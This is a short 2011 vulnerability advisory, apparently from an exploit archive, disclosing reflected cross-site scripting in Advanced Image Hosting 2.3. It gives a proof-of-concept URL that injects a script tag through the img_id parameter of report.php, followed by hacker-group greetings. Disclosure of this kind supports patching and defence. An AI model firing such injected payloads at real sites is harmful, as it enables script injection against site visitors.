Advanced Image Hosting 2.3 Cross Site Scripting

2011.09.06
Credit: R3d-D3v!L
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- [~] Tybe: suffering from RemotE CrosS SitE ScripT [~] Vendor: yabsoft.info [+] Software:AIH [+]Version : v2.3 [~] author: R3d-D3v!L [+] TEAM: DEV!L OF SYS [~] [?] contact: X[at]hotmail.co.jp [-] [?] Date: 5.53P.2oll [?] T!ME: 04:54 am GMT [?] Home: soqor.net [^] [?] =============================================================================== #AIH v2.3 suffering from RemotE CrosS SitE ScripT =============================================================================== [!] Exploit Already Tested ... on apache [^] Error console:- http://yabsoft.info/demo/aihspro/report.php?img_id=CrosS FroM HerE ;) [?] poC <X> exploit:- http://yabsoft.info/demo/aihspro/report.php?img_id=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E [~]-----------------------------{(??d-D?V!L)}------------------------------------------------ # [~] Greetz tO: virus_jordan & pal phoneix & H@CK3R M!ND & HACker_ch &dr.h0mer...etc ; # [~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # ; # [~] special thanks :all soqor members # ; # [?] special SupPoRT : packet storm & 1337day & Maksymilian Arciemowicz # ; # [?]---> ((R3d D3v!L<---&--->JUPA<---aNd--->Devil ro0t)) #; # [~]spechial FR!ND: they all are spechials ;) #; # [~] !'M 4R48!4N 3XPL0!73R. #; # [~](>D!R 4ll 0R D!E<) #; # [~]---------------------------------------------------------------------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top